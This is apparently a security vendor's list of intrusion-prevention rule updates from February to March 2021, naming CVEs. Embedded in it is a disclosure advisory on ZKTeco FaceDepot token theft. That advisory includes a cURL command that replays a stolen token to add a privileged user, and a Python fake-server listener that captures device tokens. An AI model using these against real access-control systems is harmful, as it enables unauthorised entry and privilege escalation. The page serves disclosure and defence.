All Vulnerabilities

  • 21-014 (March 23, 2021)
     Publish Date:  April 5, 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    Microsoft Office
    1010879 - Microsoft Excel XLS File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27053)
    1010878 - Microsoft Excel XLS File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27054)
    1010880 - Microsoft Office Graph Uninitialized Variable Remote Code Execution Vulnerability (CVE-2021-27057)
    1010881 - Microsoft PowerPoint PPTX File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27056)


    Oracle E-Business Suite Web Interface
    1010730* - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


    Web Server Common
    1010796* - Apache Druid Remote Code Execution Vulnerability (CVE-2021-25646)


    Web Server HTTPS
    1010868 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065)
    1010870 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1


    Web Server Nagios
    1010866* - Nagios XI Cross Site Scripting Vulnerability (CVE-2021-25299)


    Web Server Oracle
    1010590* - Oracle WebLogic Server Remote Code Execution Vulnerabilities (CVE-2020-14882, CVE-2020-14750 and CVE-2020-14883)


    Web Server SharePoint
    1010823 - Identified Microsoft SharePoint GetPermissionCollection Request (ATT&CK T1069, T1087, T1213.002, T1589.002, T1589.003)
    1010864* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 21-013 (March 16, 2021)
     Publish Date:  April 5, 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DNS Client
    1010766* - Identified Non Existing DNS Resource Record (RR) Types In DNS Traffic


    DNS Server
    1010863* - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26877)
    1010865* - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26897)


    Oracle E-Business Suite Web Interface
    1010730 - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


    SSL Client
    1010410* - OpenSSL Large DH Parameter Denial Of Service Vulnerability (CVE-2018-0732)


    Suspicious Server Ransomware Activity
    1010647* - Identified HTTP Backdoor.Win32.Cobalt.SMHP C&C Traffic Request


    Web Application PHP Based
    1010852* - phpMyAdmin 'SearchController' SQL Injection Vulnerability (CVE-2020-26935)


    Web Server Common
    1010862* - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282)
    1010858* - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282) - 1


    Web Server HTTPS
    1010849 - Identified Zoom WebSocket Upgrade Request
    1010854* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)


    Web Server Miscellaneous
    1010682* - SolarWinds Orion Platform 'SaveUserSetting' Privilege Escalation Vulnerability (CVE-2021-27258)


    Web Server Nagios
    1010866 - Nagios XI Cross Site Scripting Vulnerability (CVE-2021-25299)


    Web Server SharePoint
    1010864* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


    Windows SMB Server
    1007065* - Executable File Uploaded On Network Share (ATT&CK T1105)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 21-015 (March 30, 2021)
     Publish Date:  April 5, 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    Oracle E-Business Suite Web Interface
    1010730* - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


    Web Client Common
    1010877 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB21-09) - 4


    Web Client HTTPS
    1010132* - Microsoft Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601) - 1


    Web Server Common
    1010867 - Apache ActiveMQ Web Console Reflected Cross-Site Scripting Vulnerability (CVE-2020-13947)


    Web Server HTTPS
    1010868* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065)
    1010870* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1
    1010850* - VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21972 and CVE-2021-21973)
    1010875 - rConfig 'vendor.crud.php' Arbitrary File Upload Vulnerability (CVE-2020-12255)


    Windows SMB Server
    1010884 - Microsoft Windows RPC Remote Code Execution Vulnerability (CVE-2017-8461)


    Integrity Monitoring Rules:

    1010855* - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • Lack of mutual authentication in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to obtain a long-lasting token by impersonating the server.

    The vulnerability was submitted to ZDI on December 3, 2019.

    ZDI received one response from the vendor, which acknowledged but did not confirm the vulnerability. The responsible disclosure period expired on April 30, 2020.

    The vendor has since addressed the vulnerability and recommends installing an updated version of the software. The update can be found via the vendor's link:

    Details

    The researchers used two methods to steal the access token carried in the HTTP header:

    1. Use a Python script (zkteco.py, see below) with a self-signed SSL certificate to impersonate the ZKBiosecurity Server (ADMS), and ARP-spoof the server so that the tablet's HTTPS traffic on port 8088 reaches the script instead.
    2. Capture traffic with Wireshark on a default deployment, which uses plain HTTP instead of HTTPS.

    We found no CSRF protection that would prevent such an attack. Moreover, the token is long-lived (at least two weeks) and remains valid even after the FaceDepot 7B (the Android tablet) issues a new token. The token can be used for replay attacks, command forgery, arbitrary user addition and privilege escalation (CVE-2020-17474).

    We wrote a proof-of-concept that simulates the ZKBiosecurity ADMS with reasonable dummy responses. The SSL certificate is self-signed, and we did not install the CA on the tablet. After taking over the ZKBiosecurity Server's IP address by ARP spoofing, the script is able to obtain the token for further use. The FaceDepot tablet reconnects to the server every 2 to 3 minutes and thus automatically submits a legitimate token without any user interaction.

    Once the device serial number (SN) and the token are obtained, it is easy to, for example, create a user with cURL:

    curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \
        -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
        -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@bugoy.user.post

    Where the content of bugoy.user.post is:

    user uuid=	cardno=	pin=11111	password=	group=1	starttime=0 	endtime=0	name=Bugoy Test1	privilege=14	disable=0	verify=0
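    The following is an added example written for this page; it is not the researchers' zkteco.py and not ZKTeco code. It is the check a practitioner would run in a lab to confirm both weaknesses above: a minimal fake ADMS listener with a self-signed certificate, so that if the tablet posts to it the device evidently did not validate the server's identity (CWE-295), plus a small ledger that flags a token still in use long after it was first seen (CWE-613). The request shape (the /iclock/cdata path with an SN query parameter, the 'iClock Proxy' User-Agent, the 'token' cookie) is taken from the cURL replay above; the placeholder response body, the 24-hour staleness threshold and the certificate-generation command are assumptions. The serial number in the usage comment is the one shown on this page.

```python
"""Lab check for the two weaknesses described above (CWE-295 and CWE-613).

Added example, not the researchers' zkteco.py and not vendor code. Only the
request shape is taken from the advisory; everything else is assumed.
"""
import ssl
import sys
import time
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit


def parse_iclock_request(method, path, headers):
    """Pull the device serial number and session token out of one request.

    `headers` is any mapping of header name -> value; lookup is
    case-insensitive. Missing fields come back as None so the caller can
    decide whether the request is worth logging.
    """
    hdr = {k.lower(): v for k, v in headers.items()}
    parts = urlsplit(path)
    query = parse_qs(parts.query)
    token = None
    if hdr.get("cookie"):
        jar = SimpleCookie()
        jar.load(hdr["cookie"])
        if "token" in jar:
            token = jar["token"].value
    agent = hdr.get("user-agent") or ""
    return {
        "method": method,
        "path": parts.path,
        "sn": query.get("SN", [None])[0],
        "token": token,
        "user_agent": agent,
        # Shape observed in the advisory's replay: /iclock/... path + iClock Proxy agent.
        "is_iclock": parts.path.startswith("/iclock/") and agent.startswith("iClock Proxy"),
    }


class TokenLedger:
    """Tracks first and last sighting of each token (Unix seconds).

    A token still in use long after it was first seen is the CWE-613
    condition; max_age_s is an assumed threshold, not a vendor value.
    """

    def __init__(self, max_age_s=24 * 3600):
        self.max_age_s = max_age_s
        self.seen = {}  # token -> [first_seen, last_seen, sn]

    def record(self, token, sn, when):
        entry = self.seen.setdefault(token, [when, when, sn])
        entry[0] = min(entry[0], when)
        entry[1] = max(entry[1], when)
        return entry

    def stale_tokens(self):
        """Tokens whose observed lifetime exceeds max_age_s, sorted."""
        return sorted(t for t, (first, last, _) in self.seen.items()
                      if last - first > self.max_age_s)


class FakeAdmsHandler(BaseHTTPRequestHandler):
    """Accepts any request, records SN/token, answers with a dummy body."""

    ledger = TokenLedger()

    def _handle(self):
        info = parse_iclock_request(self.command, self.path, self.headers)
        # Drain the body so a keep-alive client does not see a reset.
        self.rfile.read(int(self.headers.get("Content-Length") or 0))
        if info["is_iclock"] and info["token"] and info["sn"]:
            self.ledger.record(info["token"], info["sn"], time.time())
            self.log_message("captured SN=%s token=%s", info["sn"], info["token"])
        body = b"OK\n"  # assumed placeholder; the real ADMS reply is not reproduced here
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_GET = _handle
    do_POST = _handle


def serve(cert_file, key_file, port=8088):
    """Listen on the ADMS HTTPS port with a self-signed certificate.

    Generate the pair with, for example (assumed lab step):
      openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj /CN=adms \
          -keyout key.pem -out cert.pem
    A request such as the tablet's
      POST /iclock/cdata?SN=LSR1915060003&... with Cookie: token=...
    arriving here means the client accepted an untrusted certificate.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(cert_file, key_file)
    httpd = HTTPServer(("0.0.0.0", port), FakeAdmsHandler)
    httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    httpd.serve_forever()


if __name__ == "__main__":
    serve(sys.argv[1], sys.argv[2])
```

    Run it as `python3 fake_adms.py cert.pem key.pem` on a host that already receives the tablet's traffic (how that is arranged is outside this example). A device that validates the server certificate will refuse the handshake and nothing is logged; a device that does not will hand over its token within the 2 to 3 minute reconnect interval the advisory describes. The same parser works unchanged on requests lifted from a plaintext capture, which is the second method above.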

    Vulnerability Type

    • CWE-613: Insufficient Session Expiration
    • CWE-295: Improper Certificate Validation

    Attack Type

    Remote

    Impact

    Information Disclosure

    Attack Vectors


    An attacker who is able to sniff the network, or to ARP-spoof a fake server into the path between tablet and server, obtains a long-lasting token.

    Mitigation

    • Deploy a firewall in front of the ZKBiosecurity Server and enforce an allow list of permitted IP and MAC addresses.
    • Deny all unlisted access.

    Note that IP and MAC filtering alone do not stop an attacker on the same network segment, who can spoof both addresses; applying the vendor's update and having the device validate the server's certificate over HTTPS addresses the root cause (CWE-295).

    Discoverer


    Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer

    Reference

    https://www.zkteco.com/en/product_detail/FaceDepot-7B.html
  • 21-012 (March 11, 2021)
     Publish Date:  March 12, 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    Web Server Miscellaneous
    1010670* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2020-17530)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 21-011 (March 9, 2021)
     Publish Date:  March 10, 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DNS Server
    1010863 - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26877)
    1010865 - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26897)


    Directory Server LDAP
    1010820* - OpenLDAP Slapd SASL Proxy Authorization Denial Of Service Vulnerability (CVE-2020-36222)


    SolarWinds Orion Platform
    1010810* - SolarWinds Orion Platform Insecure Deserialization Vulnerability (CVE-2021-25274)


    Web Application Common
    1010818* - WordPress 'Code Snippets' Plugin Cross-Site Request Forgery Vulnerability (CVE-2020-8417)


    Web Application PHP Based
    1010852 - phpMyAdmin 'SearchController' SQL Injection Vulnerability (CVE-2020-26935)


    Web Client Common
    1010861 - Microsoft Windows Graphics Component Remote Code Execution Vulnerability (CVE-2021-24093)


    Web Client Internet Explorer/Edge
    1010857 - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411)


    Web Server Common
    1010801* - FCKeditor Plugin Arbitrary File Upload Vulnerability (CVE-2009-2265)
    1010862 - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282)
    1010858 - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282) - 1


    Web Server HTTPS
    1010854* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)
    1010850* - VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21972)


    Web Server Miscellaneous
    1010496* - Apache Struts2 File Upload Denial of Service Vulnerability (CVE-2019-0233)
    1010461* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2019-0230)
    1010670* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2020-17530)
    1010682 - SolarWinds Orion Platform 'SaveUserSetting' Privilege Escalation Vulnerability (CVE-2021-27258)


    Web Server Oracle
    1010851 - Identified Oracle Application Server 'OWA_UTIL PL/SQL' Package Access


    Web Server SharePoint
    1010836 - Identified Microsoft SharePoint GetGroupCollection Request (ATT&CK T1589, T1213.002, T1087)
    1010835 - Identified Microsoft SharePoint GetGroupCollectionFromRole Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010834 - Identified Microsoft SharePoint GetGroupCollectionFromSite Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010833 - Identified Microsoft SharePoint GetGroupCollectionFromUser Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010832 - Identified Microsoft SharePoint GetGroupCollectionFromWeb Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010831 - Identified Microsoft SharePoint GetGroupInfo Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010830 - Identified Microsoft SharePoint GetRoleCollection Request (ATT&CK T1589, T1213.002, T1087, T1069)
    1010864 - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


    Zoho ManageEngine
    1010811* - Zoho ManageEngine Applications Manager SQL Injection Vulnerability (CVE-2020-35765)


    Integrity Monitoring Rules:

    1010855* - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 21-010 (March 3, 2021)
     Publish Date:  March 4, 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    Web Server HTTPS
    1010854 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)


    Integrity Monitoring Rules:

    1010855 - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 21-009 (March 2, 2021)
     Publish Date:  March 3, 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DNS Client
    1010744* - DNS Request To Ngrok Domain Detected


    Directory Server LDAP
    1010820 - OpenLDAP Slapd SASL Proxy Authorization Denial Of Service Vulnerability (CVE-2020-36222)
    1010799* - OpenLDAP Slapd Search Parsing Integer Underflow Vulnerability (CVE-2020-36228)


    FTP Server IIS
    1010797* - SolarWinds Serv-U FTP Server Stored Cross-Site Scripting Vulnerability Over FTP (CVE-2020-28001)


    SAP NetWeaver Java Application Server
    1010816 - Identified SAP Solution Manager Security Software Discovery Over HTTP (ATT&CK T1518.001)
    1010822 - Identified SAP Solution Manager Tool Transfer Over HTTP (ATT&CK T1105, T1570)


    SSL Client
    1010410* - OpenSSL Large DH Parameter Denial Of Service Vulnerability (CVE-2018-0732)


    SolarWinds Orion Platform
    1010810 - SolarWinds Orion Platform Insecure Deserialization Vulnerability (CVE-2021-25274)


    Trend Micro OfficeScan
    1010780 - Trend Micro Apex One Multiple Information Disclosure Vulnerabilities
    1010709* - Trend Micro Apex One Multiple Information Disclosure Vulnerabilities (CVE-2020-28573 and CVE-2020-28576)


    Web Application Common
    1010818 - WordPress 'Code Snippets' Plugin Cross-Site Request Forgery Vulnerability (CVE-2020-8417)


    Web Client Common
    1010760* - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB21-09) - 1
    1001933* - Identified Suspicious Usage Of Shellcode For Client


    Web Server Common
    1010796* - Apache Druid Remote Code Execution Vulnerability (CVE-2021-25646)
    1010802* - FCKeditor Plugin Arbitrary File Upload Vulnerability (CVE-2008-6178)
    1010801 - FCKeditor Plugin Arbitrary File Upload Vulnerability (CVE-2009-2265)
    1008581* - Identified Suspicious IP Addresses In XFF HTTP Header
    1010761* - PRTG Network Monitor Command Injection Vulnerability (CVE-2018-9276)
    1010804* - SolarWinds Serv-U FTP Server Stored Cross-Site Scripting Vulnerability Over HTTP (CVE-2020-28001)


    Web Server HTTPS
    1010850 - VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21972)
    1010712* - WordPress 'Contact Form 7' Plugin Arbitrary File Upload Vulnerability (CVE-2020-35489)


    Zoho ManageEngine
    1010811 - Zoho ManageEngine Applications Manager SQL Injection Vulnerability (CVE-2020-35765)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    1003613* - DHCP Server - Microsoft Windows
    1003447* - Web Server - Apache
  • 21-008 (February 23, 2021)
     Publish Date:  February 24, 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DCERPC Services
    1007596* - Identified Possible Ransomware File Extension Rename Activity Over Network Share


    DNS Client
    1010771* - DNSmasq DNSSEC Out Of Bounds Write Vulnerability (CVE-2020-25683)


    Database Microsoft SQL
    1010643* - Microsoft SQL Database Server Possible Login Brute Force Attempt


    Directory Server LDAP
    1010799 - OpenLDAP Slapd Search Parsing Integer Underflow Vulnerability (CVE-2020-36228)


    FTP Server IIS
    1010797 - SolarWinds Serv-U FTP Server Stored Cross-Site Scripting Vulnerability Over FTP (CVE-2020-28001)


    Hot Rod Client
    1009119* - Red Hat JBoss Data Grid Hot Rod Client Insecure Deserialization (CVE-2017-15089)


    Memcached
    1008916* - Identified Memcached Reflected UDP Traffic


    Web Application Common
    1010488* - Identified WordPress Database Reset Attempt
    1010562* - Mantis Bug Tracker 'verify.php' Remote Password Reset Vulnerability (CVE-2017-7615)
    1009310* - Microsoft Exchange Server SSRF Vulnerability (CVE-2018-16793)


    Web Application PHP Based
    1008858* - Identified Access To 'wp-admin' Directory


    Web Server Common
    1010796 - Apache Druid Remote Code Execution Vulnerability (CVE-2021-25646)
    1010802 - FCKeditor Plugin Arbitrary File Upload Vulnerability (CVE-2008-6178)
    1007651* - Identified Absence Of Configured CDN/Reverse Proxy HTTP Header
    1010761 - PRTG Network Monitor Command Injection Vulnerability (CVE-2018-9276)
    1010804 - SolarWinds Serv-U FTP Server Stored Cross-Site Scripting Vulnerability Over HTTP (CVE-2020-28001)


    Web Server HTTPS
    1010795* - Joomla CMS Cross-Site Scripting Vulnerability (CVE-2021-23124)
    1010772* - Microsoft Exchange Remote Code Execution Vulnerability (CVE-2020-17132)


    Web Server Miscellaneous
    1008747* - Adobe ColdFusion RMI Registry Insecure Deserialization (CVE-2017-11284)
    1008840* - Apache CouchDB '_config' Command Execution Vulnerability


    Web Server Oracle
    1010752* - Oracle Coherence Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14756)


    Web Server SharePoint
    1010794* - Microsoft SharePoint Workflow Deserialization Of Untrusted Data Remote Code Execution Vulnerability (CVE-2021-24066)


    Zoho ManageEngine
    1010774 - Identified WebNMS Framework Server Sensitive File Access (ATT&CK T1552.001)


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    There are no new or updated Log Inspection Rules in this Security Update.
  • 21-007 (February 16, 2021)
     Publish Date:  February 17, 2021
    * indicates a new version of an existing rule

    Deep Packet Inspection Rules:

    DCERPC Services
    1009801* - Microsoft Windows NTLM Elevation Of Privilege Vulnerability (CVE-2019-1040)
    1008179* - Restrict File Extensions For Rename Activity Over Network Share


    DNS Client
    1010771 - DNSmasq DNSSEC Out Of Bounds Write Vulnerability (CVE-2020-25683)
    1010784 - DNSmasq DNSSEC Out Of Bounds Write Vulnerability (CVE-2020-25687)
    1010766* - Identified Non Existing DNS Resource Record (RR) Types In DNS Traffic


    Database Microsoft SQL
    1008759* - Microsoft SQL Server 'EXECUTE AS' Privilege Escalation Vulnerability


    Directory Server LDAP
    1010754* - Microsoft Windows NTLM Elevation Of Privilege Vulnerability Over LDAP (CVE-2019-1040)


    Microsoft Office
    1010785 - Microsoft Excel XLS File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-24070)
    1010786 - Microsoft Excel XLSX File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-24067)


    Suspicious Client Application Activity
    1010741* - Identified HTTP Backdoor Python FreakOut A Runtime Detection


    Suspicious Client Ransomware Activity
    1010792 - Identified Cobalt Strike Default Self-signed SSL/TLS Certificate


    Suspicious Server Application Activity
    1008918* - Identified Memcached Amplified Reflected Response


    Web Application Common
    1005933* - Identified Directory Traversal Sequence In Uri Query Parameter


    Web Application Ruby Based
    1008574* - Ruby On Rails Development Web Console Code Execution Vulnerability (CVE-2015-3224)


    Web Client Common
    1010760* - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB21-09) - 1
    1010790 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB21-09) - 3
    1010787 - Microsoft Windows Camera Codec Pack Image Processing Out-Of-Bounds Write Vulnerability (CVE-2021-24081)
    1010788 - Microsoft Windows Camera Codec Pack Out-Of-Bounds Write Remote Code Execution Vulnerability (CVE-2021-24091)
    1004226* - Microsoft Windows Help Centre Malformed Escape Sequences Vulnerability
    1006582* - Microsoft Windows Help Centre Malformed Escape Sequences Vulnerability (CVE-2010-1885)
    1010789 - Microsoft Windows WAB File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability (CVE-2021-24083)


    Web Client SSL
    1006296* - Detected SSLv3 Response (ATT&CK T1032)
    1006298* - Identified CBC Based Cipher Suite In SSLv3 Request (ATT&CK T1032)


    Web Server Apache
    1010751 - Proxifier Proxy Client


    Web Server Common
    1010737* - CMS Made Simple 'Showtime2' Reflected Cross Site Scripting Vulnerability (CVE-2020-20138)
    1010736* - Cisco Data Center Network Manager Authentication Bypass Vulnerability (CVE-2019-15977)
    1010769 - Identified Kubernetes Namespace API Requests
    1010477* - Java Unserialize Remote Code Execution Vulnerability - 1


    Web Server HTTPS
    1010795 - Joomla CMS Cross-Site Scripting Vulnerability (CVE-2021-23124)
    1010772 - Microsoft Exchange Remote Code Execution Vulnerability (CVE-2020-17132)


    Web Server Miscellaneous
    1008610* - Block Object-Graph Navigation Language (OGNL) Expressions Initiation In Apache Struts HTTP Request
    1004874* - TimThumb Plugin Remote Code Execution Vulnerability


    Web Server SharePoint
    1010764* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-24072)
    1010794 - Microsoft SharePoint Workflow Deserialization Of Untrusted Data Remote Code Execution Vulnerability (CVE-2021-24066)


    Windows Services RPC Server DCERPC
    1008479* - Identified Usage Of WMI Execute Methods - Server


    Integrity Monitoring Rules:

    There are no new or updated Integrity Monitoring Rules in this Security Update.


    Log Inspection Rules:

    1003631* - DNS Server - Microsoft Windows